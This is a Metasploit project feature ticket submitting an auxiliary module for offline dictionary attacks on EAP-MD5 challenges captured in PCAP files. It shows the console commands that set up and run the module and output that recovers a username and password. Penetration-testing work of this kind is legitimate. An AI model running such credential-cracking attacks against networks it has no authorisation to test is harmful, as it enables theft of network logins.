Feature #4439
EAP-MD5 offline dictionary attack
| Status: | HavePatch | Start date: | 05/15/2011 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | James Lee | % Done: | 0% |
|
| Category: | modules - auxiliary | |||
| Target version: | Metasploit 4.3.0 | |||
| Resolution: | How To Use: | |||
| Release Note: |
Description
Hello,
Please find in attachment an auxiliary module that launch a dictionary attack against EAP-MD5 challenges.
Tested succesfully with PCAP files in wired, wireless and non eap environments.
resource (eap.rc)> use auxiliary/gather/eap_md5_dict
resource (eap.rc)> set PCAPFILE "/home/pello/wlan.cap"
PCAPFILE => /home/pello/wlan.cap
resource (eap.rc)> set WORDLIST "/home/pello/dict.txt"
WORDLIST => /home/pello/dict.txt
resource (eap.rc)> run
[*] Looking for EAP-MD5 challenge in /home/pello/wlan.cap
[*] Passwords loaded from /home/pello/dict.txt
[+] The login/password is: dummiz/metasploit
[*] Auxiliary module execution completed
Cheers,
Associated revisions
Adding pello's EAP-MD5 bruteforce module
See #4439.
This is part of an effort to move modules from Redmine and drop
them into GitHub for easier tracking and collaboration.
History
Updated by Tod Beardsley 4 months ago
- Target version set to Metasploit 4.3.0
- Status changed from New to HavePatch